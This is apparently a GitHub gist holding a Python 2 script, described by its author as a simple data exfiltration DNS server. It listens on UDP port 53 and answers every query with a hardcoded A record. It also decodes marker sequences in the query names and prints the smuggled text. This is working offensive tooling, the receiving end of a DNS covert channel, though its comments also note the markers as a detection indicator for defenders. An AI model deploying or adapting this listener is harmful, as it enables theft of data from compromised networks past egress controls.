
@xct

xct/dnsrv.py Secret

Created March 7, 2019 19:23
Simple data exfiltration dns server
#!/usr/bin/env python
# based on http://www.tranquilidadtecnologica.com/2006/04/servidor-fake-dns-en-python.html
import socket
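class DNSQuery:
    """Decode the name in one raw DNS query and build a fixed A-record reply.

    ``data`` is the datagram exactly as received.  It is untrusted input:
    anyone who can reach the listening socket controls every byte, so the
    parser bounds-checks each read and leaves ``domain`` empty for anything
    it cannot decode instead of raising.

    Attributes:
        data: the raw query as passed in.
        domain: the decoded query name, each label followed by ``'.'``;
            ``''`` when the packet is too short, truncated, uses a
            non-standard opcode, or has a label length above 63.
    """

    # Lines recently shown by uprint().  Kept on the class so that it is
    # shared by all instances (the script creates one instance per packet).
    last = []

    def __init__(self, data):
        self.data = data
        self.domain = ''
        # The 12-byte header plus at least one length byte must be present.
        if len(data) < 13:
            return
        # Bits 3-6 of the third header byte are the opcode; 0 = standard query.
        opcode = (ord(data[2]) >> 3) & 15
        if opcode != 0:
            return
        pos = 12
        name = ''
        length = ord(data[pos])
        while length != 0:
            end = pos + length + 1
            # A label is at most 63 bytes; larger values are compression
            # pointers or reserved.  `end` must also still index a byte,
            # because the next length (or the terminating zero) is read there.
            if length > 63 or end >= len(data):
                return
            name += data[pos + 1:end] + '.'
            pos = end
            length = ord(data[pos])
        self.domain = name

    def request(self, ip):
        """Return the reply packet answering the query with ``ip``.

        Args:
            ip: dotted-quad IPv4 address string placed in the A record.

        Returns:
            The reply as a string, or ``''`` when no name was decoded.
        """
        packet = ''
        if self.domain:
            # Same transaction id; flags 0x8180 = response, recursion
            # desired and available, rcode 0.
            packet += self.data[:2] + "\x81\x80"
            # QDCOUNT is copied from the query and reused as ANCOUNT;
            # NSCOUNT and ARCOUNT are zero.
            packet += self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00'
            # NOTE(review): everything after the header is echoed, so any
            # records that followed the question in the query end up ahead
            # of the answer record.
            packet += self.data[12:]
            # Answer name: compression pointer to offset 12 (the question).
            packet += '\xc0\x0c'
            # TYPE A, CLASS IN, TTL 60 seconds, RDLENGTH 4.
            packet += '\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04'
            packet += ''.join(chr(int(octet)) for octet in ip.split('.'))
        return packet

    def uprint(self, text):
        """Print ``text`` unless it is among the recently printed lines.

        The history is emptied once it holds more than four entries.
        """
        if text in self.last:
            return
        self.last.append(text)
        print(text)
        if len(self.last) > 4:
            # Clear in place: rebinding self.last would create an instance
            # attribute and leave the shared class-level list full.
            del self.last[:]

    def pprint(self):
        """Decode the marker sequences in ``domain`` and print tagged lines.

        ``--`` becomes a space and ``~~`` a newline; every resulting line
        that contains ``~!`` is printed with that tag removed.  The dots
        that separate DNS labels are left in the text.

        For defenders: these marker sequences inside query names are what
        this listener looks for, so they can serve as a string indicator in
        DNS logs for this particular encoding.
        """
        text = self.domain.replace("--", " ").replace("~~", "\n")
        for line in text.splitlines():
            if "~!" in line:
                # uprint(cleaned) could be used here instead to avoid
                # printing the same line multiple times.
                print(line.replace("~!", ""))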
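if __name__ == '__main__':
    # Address returned in the A record of every reply, whatever name is asked.
    ip = '10.10.16.46'
    print('FakeDNS:: dom.query. 60 IN A %s' % ip)
    udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        # '' binds every local interface; UDP 53 is the standard DNS port.
        udps.bind(('', 53))
        while 1:
            # At most 1024 bytes are read per datagram.  The payload comes
            # from whoever can reach this port and is not authenticated.
            data, addr = udps.recvfrom(1024)
            p = DNSQuery(data)
            udps.sendto(p.request(ip), addr)
            p.pprint()
    except KeyboardInterrupt:
        print('Done')
    finally:
        # Only KeyboardInterrupt is handled above; any other exception still
        # propagates and stops the server, but the socket is closed first.
        udps.close()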